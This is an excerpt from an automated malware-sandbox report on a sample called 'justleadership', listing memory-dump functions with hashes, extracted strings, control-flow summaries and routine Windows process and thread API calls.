                                              • Source File: 00000000.00000002.2163152545.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d30000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: fpq$8
                                              • API String ID: 0-1207623099
                                              • Opcode ID: a99113a601f7e4862112f0b1817f848e54c77fad8e52b4317f6f4aec94b519d7
                                              • Instruction ID: b8de55c4dab3cc06bd40099ec89d452ecf9cde75fe1067fd1dd4dd51c869b057
                                              • Opcode Fuzzy Hash: a99113a601f7e4862112f0b1817f848e54c77fad8e52b4317f6f4aec94b519d7
                                              • Instruction Fuzzy Hash: 9842E371D006298FDB64DF69C850AD9B7B2BF89300F1486EAD40DA7255EB34AE85CF80
                                              Function 06B881B8 Relevance: 2.9, Strings: 2, Instructions: 367COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2161621561.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6b80000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Tekq$Tekq
                                              • API String ID: 0-2269808460
                                              • Opcode ID: a88f3c58567faef61829c6f43c7fc02cfdce28e6f50af4ee99e72e3dfa89125c
                                              • Instruction ID: d8fa433aca40ff5dd2ba05de729911f5a124c779c28ea892ceb1a524f5f5c0cd
                                              • Opcode Fuzzy Hash: a88f3c58567faef61829c6f43c7fc02cfdce28e6f50af4ee99e72e3dfa89125c
                                              • Instruction Fuzzy Hash: A3F1E4B4E01218CFDBA4EF69D944BA9BBB2FF89300F5091E9D509A7251DB349E85CF40
                                              Function 06B881C8 Relevance: 2.9, Strings: 2, Instructions: 367COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2161621561.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6b80000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Tekq$Tekq
                                              • API String ID: 0-2269808460
                                              • Opcode ID: b9e187e50eba8a251af1f2f5409b8ee3c8e4141fc688a21dd6c5d806daee3229
                                              • Instruction ID: 38635932040f5e70d2f968e0d26322b8fd81bfe0ede85e0d88273fcc7ad9f2d9
                                              • Opcode Fuzzy Hash: b9e187e50eba8a251af1f2f5409b8ee3c8e4141fc688a21dd6c5d806daee3229
                                              • Instruction Fuzzy Hash: D8F1E5B0E05218CFEBA4EF69D944BA9B7B2FF89300F5091E9D509A7251DB349E84CF40
                                              Function 06B88845 Relevance: 2.8, Strings: 2, Instructions: 326COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2161621561.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6b80000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Tekq$Tekq
                                              • API String ID: 0-2269808460
                                              • Opcode ID: 4e042d0ad719efe0f2842e9bf095025d73bd04c6ae5b35949986d20d08f225ee
                                              • Instruction ID: 6847f1395e4ab9188510a4edb956224b73b621d5f5bbcd9b325ed2bc9397c23a
                                              • Opcode Fuzzy Hash: 4e042d0ad719efe0f2842e9bf095025d73bd04c6ae5b35949986d20d08f225ee
                                              • Instruction Fuzzy Hash: 77E1D0B4E01259CFDBA4EF68C984BADBBB2FB49300F5091E9D509A7251DB749E84CF40
                                              Function 06D3CA10 Relevance: 2.8, Strings: 2, Instructions: 281COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2163152545.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d30000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: i\w$i\w
                                              • API String ID: 0-3622730961
                                              • Opcode ID: 00a46826f799858e8b4e26c05f2c0ea1f46cfcd794748301a5375beaa7be8c29
                                              • Instruction ID: bb7cd87ed312bab0c8b0d2e8fad9d35a194e1bafd8e0c3c026e380de9277c522
                                              • Opcode Fuzzy Hash: 00a46826f799858e8b4e26c05f2c0ea1f46cfcd794748301a5375beaa7be8c29
                                              • Instruction Fuzzy Hash: 8FB15C70E10229DFDB50CFA9D9857AEBBF2AF88304F148529E415FB294EB749845CB81
                                              Function 06D3D2E0 Relevance: 2.8, Strings: 2, Instructions: 266COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2163152545.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d30000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: i\w$i\w
                                              • API String ID: 0-3622730961
                                              • Opcode ID: c874ba02025114bd4e9d15fed2b504a6164bd3b0735c9d1caa883c9e432880d5
                                              • Instruction ID: 59a1f9f4d09d7eb5980cad15dc3a91b839f4612f7e4d5fde85ae4b9c0521000d
                                              • Opcode Fuzzy Hash: c874ba02025114bd4e9d15fed2b504a6164bd3b0735c9d1caa883c9e432880d5
                                              • Instruction Fuzzy Hash: 18B16EB0E00229CFDB50CFA9D9857EDBBF2AF88314F148529D419EB294EB749845CF81
                                              Function 06D34300 Relevance: 2.7, Strings: 2, Instructions: 156COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2163152545.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d30000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: fpq$h
                                              • API String ID: 0-747736143
                                              • Opcode ID: 2501a695aabdc79323a69f0225c0cfb7303f7da82a4b0875636d56480da8cd45
                                              • Instruction ID: 6b795649b3288d8ad2d84da89baafb3420b5e26d432528dbcfecfe50aca1e16b
                                              • Opcode Fuzzy Hash: 2501a695aabdc79323a69f0225c0cfb7303f7da82a4b0875636d56480da8cd45
                                              • Instruction Fuzzy Hash: C261B671D006298BEB64DF6ACC50BD9B7F2BF89310F14C2AAD50DA7264DB345A85CF90
                                              Function 06A45F12 Relevance: 2.3, Strings: 1, Instructions: 1086COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2159882193.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a40000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 2
                                              • API String ID: 0-450215437
                                              • Opcode ID: bcdf78ea420dfd9f53468186c3476cb3740c4f3f07374fa3628c9f69a989b62b
                                              • Instruction ID: 941bed0f65d0fd71a4b81b497591106a5218c89e80d5c93c3bf6288f89b51e52
                                              • Opcode Fuzzy Hash: bcdf78ea420dfd9f53468186c3476cb3740c4f3f07374fa3628c9f69a989b62b
                                              • Instruction Fuzzy Hash: C0C2A2B4E002298FDB65DF68C984B9DBBB6FB89300F1091E9D509A7355DB34AE85CF40
                                              Function 06B6DCCD Relevance: 1.6, Strings: 1, Instructions: 314COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2161536871.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6b60000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: b9a
                                              • API String ID: 0-1930411133
                                              • Opcode ID: 7b59f0d35ba99c887e9409fbccec0a0a0d1a36b3f15553e5d536a287a89be6f7
                                              • Instruction ID: 40d94f304409ce8ec56ba73d089e1b319fe08b37fa4de1c88d092bd49abdf773
                                              • Opcode Fuzzy Hash: 7b59f0d35ba99c887e9409fbccec0a0a0d1a36b3f15553e5d536a287a89be6f7
                                              • Instruction Fuzzy Hash: AEE1E3B4E05228CFDBA5DF29D944BE9B7B2FB49300F1091E9E509A7250DB789E81CF40
                                              Function 06D31E88 Relevance: 1.5, Strings: 1, Instructions: 273COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2163152545.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d30000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PHkq
                                              • API String ID: 0-902561536
                                              • Opcode ID: 42bce7ca4466e13a415d572768868fce4ea5ac00ac47d3f4a6ec882b16c05b42
                                              • Instruction ID: db7f300b7e174f2eda54ec9cb19642348466c991eadd09dc58663babe0579a6a
                                              • Opcode Fuzzy Hash: 42bce7ca4466e13a415d572768868fce4ea5ac00ac47d3f4a6ec882b16c05b42
                                              • Instruction Fuzzy Hash: 08C11670D04229CFEB64CFA9D984BADBBF2BF49304F2080A9D549A7351D7759A85CF40
                                              Function 06B6E3D0 Relevance: 1.5, Strings: 1, Instructions: 272COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2161536871.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6b60000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 5Us-
                                              • API String ID: 0-3440070036
                                              • Opcode ID: 6ee7a72e6585aa4e8a49089c539503af64aa88f9dc13b5cde112f2dcd52ad1fc
                                              • Instruction ID: 87bfead948c3a69fed7f5b1fa6ca92f5fe9355d7b32306d2a5cceab52cda2d9a
                                              • Opcode Fuzzy Hash: 6ee7a72e6585aa4e8a49089c539503af64aa88f9dc13b5cde112f2dcd52ad1fc
                                              • Instruction Fuzzy Hash: 4FD1F2B4D05268CFDBA4DF25D988BADB7B5FB49304F1050E9E409A7291DB789E81CF40
                                              Function 06D31E78 Relevance: 1.5, Strings: 1, Instructions: 263COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2163152545.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d30000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PHkq
                                              • API String ID: 0-902561536
                                              • Opcode ID: 31d0b9095f7927467d1812325e1cce89e7ec3bdbdf355a4e6eacbafb068801a7
                                              • Instruction ID: 1f1217dcd17df32c76f87f20973a21c97bd9b9b8a9d36ee54a25af3e1362b1f1
                                              • Opcode Fuzzy Hash: 31d0b9095f7927467d1812325e1cce89e7ec3bdbdf355a4e6eacbafb068801a7
                                              • Instruction Fuzzy Hash: 08B10574D04229CFEB64CFA9D984BADBBF2BF49304F2080A9D549A7350DB759A85CF40
                                              Function 06B6CA70 Relevance: 1.5, Strings: 1, Instructions: 203COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2161536871.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6b60000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: doq
                                              • API String ID: 0-3318987180
                                              • Opcode ID: c54df9e1419051119dc77d53e124a3250a733e738383c32c06519d29ab1ea411
                                              • Instruction ID: f7f85d0b505d54533cd6bf8a08e2b6038f1103d0e671ce5ca86d611738275602
                                              • Opcode Fuzzy Hash: c54df9e1419051119dc77d53e124a3250a733e738383c32c06519d29ab1ea411
                                              • Instruction Fuzzy Hash: F59115B4E01208CFDB50DFA9D984BADBBB2FB49304F1090A9E549B7294DB785E85CF41
                                              Function 06B6CA80 Relevance: 1.5, Strings: 1, Instructions: 201COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2161536871.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6b60000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: doq
                                              • API String ID: 0-3318987180
                                              • Opcode ID: bc6b0f39fc479c4966c5e1ededd2718994331a88c4d63f36e48456abf94bc7a4
                                              • Instruction ID: f1a1887abf15828e19b5b8cbb88e848a640a2d70baac3364ad21b00acd963130
                                              • Opcode Fuzzy Hash: bc6b0f39fc479c4966c5e1ededd2718994331a88c4d63f36e48456abf94bc7a4
                                              • Instruction Fuzzy Hash: 019117B4E01208CFDB50DFA9D984BADBBF2FB49304F1090A9E549A7294DB785E85CF41
                                              Function 06B80040 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2161621561.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6b80000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \
                                              • API String ID: 0-2967466578
                                              • Opcode ID: c66cb13f5788eae1b261059611811f4a7a880ec007a27f9c86119941c65d2016
                                              • Instruction ID: d5c4e2d6f4b03a9c862079c4eefdfab1dec7ab8e0883fb801013e8297a09807d
                                              • Opcode Fuzzy Hash: c66cb13f5788eae1b261059611811f4a7a880ec007a27f9c86119941c65d2016
                                              • Instruction Fuzzy Hash: 35414AB1E056188FEB58DF6BDD4069AFAF7AFC9314F14C0BA950CAA224DB340946CF05
                                              Function 06A4730C Relevance: .5, Instructions: 471COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2159882193.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a40000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b0373f0c6935001d606eac457891fc39a07642be0721eb7398f92e225abeda31
                                              • Instruction ID: 963a2561041a3b17381cbe8c664a62ff5214f4a57d4c3763ebbd10f1cbfbd97e
                                              • Opcode Fuzzy Hash: b0373f0c6935001d606eac457891fc39a07642be0721eb7398f92e225abeda31
                                              • Instruction Fuzzy Hash: AD32B374A45229CFCBA5EF28C984A99B7B6FF88300F1085E9D50DA7355DB30AE81CF54
                                              Function 0173F6B0 Relevance: .3, Instructions: 315COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2121702758.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1730000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1cd57fa90a529fe0ec9f66543c3835e182f1d5ed2b131f25a5bca2a45aca58ff
                                              • Instruction ID: b32a44f70d7d3794d77fdf8dae2fd7e03ba9b62d9720596f1ddf49b923d7fc53
                                              • Opcode Fuzzy Hash: 1cd57fa90a529fe0ec9f66543c3835e182f1d5ed2b131f25a5bca2a45aca58ff
                                              • Instruction Fuzzy Hash: 471262B24117468AE730CF65E98C1897BB1BB85338B94C709D2616F2E9DBF8158BCF44
                                              Function 06A4D2F0 Relevance: .3, Instructions: 278COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2159882193.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a40000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 89fefc9afe087772444eff1d11232a77a8706a5458e1ea0a4178343eaaee2140
                                              • Instruction ID: 07c464245a3694db52ca1ed6e08070c613549034fc4d8cd9fd071cc71efc9078
                                              • Opcode Fuzzy Hash: 89fefc9afe087772444eff1d11232a77a8706a5458e1ea0a4178343eaaee2140
                                              • Instruction Fuzzy Hash: F8C1E474D05218CFEBA4FFA9D844BADBBF2BF89304F1080AAD419AB251DB745985CF40
                                              Function 06A967A1 Relevance: .3, Instructions: 270COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2160451973.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a90000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 510af375f7715eb44a224afd620e078fa2d8e599e09819cf97bee26926224cb7
                                              • Instruction ID: 29142f4865bdc46638658f485ca3a6f04d4f7416b9f63ca4f5931d65224b35e6
                                              • Opcode Fuzzy Hash: 510af375f7715eb44a224afd620e078fa2d8e599e09819cf97bee26926224cb7
                                              • Instruction Fuzzy Hash: 38C19174E01218CFEB94EF69D984BADBBF2BF49300F2090A9D509A7251DB385E85CF51
                                              Function 06A967B0 Relevance: .3, Instructions: 269COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2160451973.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a90000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 230eb65e55c0ba59d5e3910512611f76a6dbfbf35577a6f0c3a07e957f9f7c80
                                              • Instruction ID: d43a51e6e7b697e66bf60ee06dd55da32c2a783f2684673e97e09ec2379be8eb
                                              • Opcode Fuzzy Hash: 230eb65e55c0ba59d5e3910512611f76a6dbfbf35577a6f0c3a07e957f9f7c80
                                              • Instruction Fuzzy Hash: ACC1D274E01218CFEB94EF69D984BADB7F2BF49300F20A0A9D509A7251DB385E85CF51
                                              Function 0173F6A2 Relevance: .2, Instructions: 225COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2121702758.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1730000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 17c66c59b2479f1bd74d4b3836a49fe7e3a9af02d3fb75b9352e56ec0c0f77c5
                                              • Instruction ID: a0c2cd06c0c3601564a27b26f5307c870e41adda34af654c2d5441bda7ba15e9
                                              • Opcode Fuzzy Hash: 17c66c59b2479f1bd74d4b3836a49fe7e3a9af02d3fb75b9352e56ec0c0f77c5
                                              • Instruction Fuzzy Hash: 6CC1D8B28117468BD720CF69E98C1997BB1BB85334F548319D1616B2E8DBF8258BCF44
                                              Function 06B6D1F8 Relevance: .1, Instructions: 133COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2161536871.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6b60000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1541e958fa350132c06009e5153029841f1fd8f4fd4b1159c3419404e9c7a11d
                                              • Instruction ID: 0123280096abd7417b7ca6998b75b74ccca929931932f83dfc7ef640edf8752e
                                              • Opcode Fuzzy Hash: 1541e958fa350132c06009e5153029841f1fd8f4fd4b1159c3419404e9c7a11d
                                              • Instruction Fuzzy Hash: DA51E1B4E05208CFDB94DFAAD448BEDBBB2EF49300F10906AE509B7284D7789955CF44
                                              Function 06B6D1EA Relevance: .1, Instructions: 131COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2161536871.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6b60000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4e9a0bc609f577a8404fab4f213673b02faee63dad2fd4f41c857d398658c213
                                              • Instruction ID: 4536652f873dcca081ba435a1ea5b73b5e1d4ca6e860f80a9048043759691894
                                              • Opcode Fuzzy Hash: 4e9a0bc609f577a8404fab4f213673b02faee63dad2fd4f41c857d398658c213
                                              • Instruction Fuzzy Hash: 705102B4E05208CFDB94DFA9D544BEDBBB2EF49300F10906AE009B7284D7389999CF44
                                              Function 06D34FB0 Relevance: .1, Instructions: 88COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2163152545.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d30000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 48ab768a8b3450fce9fe9be935c0b0f3d651e3a755cb395cfbbadee4deb459a4
                                              • Instruction ID: 6366ff4a2bccbfca04e229b53c6f8578baaee007f29c2c64631c21768cd1b279
                                              • Opcode Fuzzy Hash: 48ab768a8b3450fce9fe9be935c0b0f3d651e3a755cb395cfbbadee4deb459a4
                                              • Instruction Fuzzy Hash: F831D7B5E002188FDB98DF6AD941BAEBBF6AB88300F10C0AAD519A7251DB355A45CF40
                                              Function 0173CCC8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 135threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 854 173ccc8-173cd67 GetCurrentProcess 859 173cd70-173cda4 GetCurrentThread 854->859 860 173cd69-173cd6f 854->860 861 173cda6-173cdac 859->861 862 173cdad-173cde1 GetCurrentProcess 859->862 860->859 861->862 864 173cde3-173cde9 862->864 865 173cdea-173ce05 call 173ceb2 862->865 864->865 868 173ce0b-173ce3a GetCurrentThreadId 865->868 869 173ce43-173cea5 868->869 870 173ce3c-173ce42 868->870 870->869
                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 0173CD56
                                              • GetCurrentThread.KERNEL32 ref: 0173CD93
                                              • GetCurrentProcess.KERNEL32 ref: 0173CDD0
                                              • GetCurrentThreadId.KERNEL32 ref: 0173CE29
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2121702758.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1730000_justleadership.jbxd
                                              Similarity
                                              • API ID: Current$ProcessThread
                                              • String ID: i\w
                                              • API String ID: 2063062207-1682270839
                                              • Opcode ID: 3a6a8d7e3ace162a5c0a6b819d00c33b3be7699b710bc79e802545261351cf3f
                                              • Instruction ID: 9ae656b8a249f9614fe6aae3acf94d36186309a7cf777650c08959b7ccee916a
                                              • Opcode Fuzzy Hash: 3a6a8d7e3ace162a5c0a6b819d00c33b3be7699b710bc79e802545261351cf3f
                                              • Instruction Fuzzy Hash: 3E5148B09012098FDB15EFA9D548BEEBFF1AF88304F24846AE059A7261D7349984CF65
                                              Function 0173CCD8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 877 173ccd8-173cd67 GetCurrentProcess 881 173cd70-173cda4 GetCurrentThread 877->881 882 173cd69-173cd6f 877->882 883 173cda6-173cdac 881->883 884 173cdad-173cde1 GetCurrentProcess 881->884 882->881 883->884 886 173cde3-173cde9 884->886 887 173cdea-173ce05 call 173ceb2 884->887 886->887 890 173ce0b-173ce3a GetCurrentThreadId 887->890 891 173ce43-173cea5 890->891 892 173ce3c-173ce42 890->892 892->891
                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 0173CD56
                                              • GetCurrentThread.KERNEL32 ref: 0173CD93
                                              • GetCurrentProcess.KERNEL32 ref: 0173CDD0
                                              • GetCurrentThreadId.KERNEL32 ref: 0173CE29
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2121702758.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1730000_justleadership.jbxd
                                              Similarity
                                              • API ID: Current$ProcessThread
                                              • String ID: i\w
                                              • API String ID: 2063062207-1682270839
                                              • Opcode ID: 4272b17fd73d477f8cde6f3a8f81da760922eff292055ba6f61dcba476a868ed
                                              • Instruction ID: b1b524cbe187adf2a3f5e7bb2d2ce7d059690ec006378e0d5cb2d74aaa5e1bf9
                                              • Opcode Fuzzy Hash: 4272b17fd73d477f8cde6f3a8f81da760922eff292055ba6f61dcba476a868ed
                                              • Instruction Fuzzy Hash: 725135B09016098FDB14EFAAD548BEEFFF1BF88304F208469E059A7261D7749984CF65
                                              Function 06B60AC0 Relevance: 7.7, Strings: 6, Instructions: 152COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1209 6b60ac0-6b60b0c 1213 6b60b12-6b60b24 1209->1213 1214 6b60c8a-6b60cc7 1209->1214 1217 6b60b26-6b60b72 1213->1217 1218 6b60b74-6b60bbd 1213->1218 1234 6b60bc0-6b60c00 1217->1234 1218->1234 1239 6b60c02-6b60c08 1234->1239 1240 6b60c0a-6b60c14 1234->1240 1241 6b60c17-6b60c5a 1239->1241 1240->1241 1248 6b60c80-6b60c87 1241->1248 1249 6b60c5c-6b60c78 1241->1249 1249->1248
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2161536871.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6b60000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (oq$4'kq$4'kq$4'kq$4'kq$poq
                                              • API String ID: 0-755401861
                                              • Opcode ID: 72cef21c83ccc97f54070847d2a914dec8326a823af3b5244682d06fcf6862f3
                                              • Instruction ID: fca4788e008ddfe79ebe6403de041e12751a9c917f727d60d6789ead2d057c7f
                                              • Opcode Fuzzy Hash: 72cef21c83ccc97f54070847d2a914dec8326a823af3b5244682d06fcf6862f3
                                              • Instruction Fuzzy Hash: 91519270A402098FC755EF6985506AFBBE7BFC8300F14896DC406973A9DF35AD4687A1
                                              Function 06A4EAC8 Relevance: 6.6, Strings: 5, Instructions: 354COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1252 6a4eac8-6a4eaf0 1254 6a4eaf6-6a4eafa 1252->1254 1255 6a4ebdc-6a4ec01 1252->1255 1256 6a4eafc-6a4eb08 1254->1256 1257 6a4eb0e-6a4eb12 1254->1257 1264 6a4ec08-6a4ec2c 1255->1264 1256->1257 1256->1264 1258 6a4ec33-6a4ec58 1257->1258 1259 6a4eb18-6a4eb2f 1257->1259 1278 6a4ec5f-6a4ecb2 1258->1278 1270 6a4eb31-6a4eb3d 1259->1270 1271 6a4eb43-6a4eb47 1259->1271 1264->1258 1270->1271 1270->1278 1273 6a4eb73-6a4eb8c 1271->1273 1274 6a4eb49-6a4eb62 1271->1274 1284 6a4ebb5-6a4ebd9 1273->1284 1285 6a4eb8e-6a4ebb2 1273->1285 1274->1273 1286 6a4eb64-6a4eb67 1274->1286 1294 6a4ecb4-6a4ecd4 1278->1294 1295 6a4ecea-6a4ed0f 1278->1295 1290 6a4eb70 1286->1290 1290->1273 1302 6a4ed16-6a4ed6a 1294->1302 1303 6a4ecd6-6a4ece7 1294->1303 1295->1302 1310 6a4ed70-6a4ed7c 1302->1310 1311 6a4ee11-6a4ee5f 1302->1311 1314 6a4ed86-6a4ed9a 1310->1314 1315 6a4ed7e-6a4ed85 1310->1315 1323 6a4ee61-6a4ee85 1311->1323 1324 6a4ee8f-6a4ee95 1311->1324 1318 6a4ed9c-6a4edc1 1314->1318 1319 6a4ee09-6a4ee10 1314->1319 1330 6a4ee04-6a4ee07 1318->1330 1331 6a4edc3-6a4eddd 1318->1331 1323->1324 1326 6a4ee87 1323->1326 1327 6a4eea7-6a4eeb6 1324->1327 1328 6a4ee97-6a4eea4 1324->1328 1326->1324 1330->1318 1330->1319 1331->1330 1333 6a4eddf-6a4ede8 1331->1333 1334 6a4edf7-6a4ee03 1333->1334 1335 6a4edea-6a4eded 1333->1335 1335->1334
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2159882193.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a40000_justleadership.jbxd
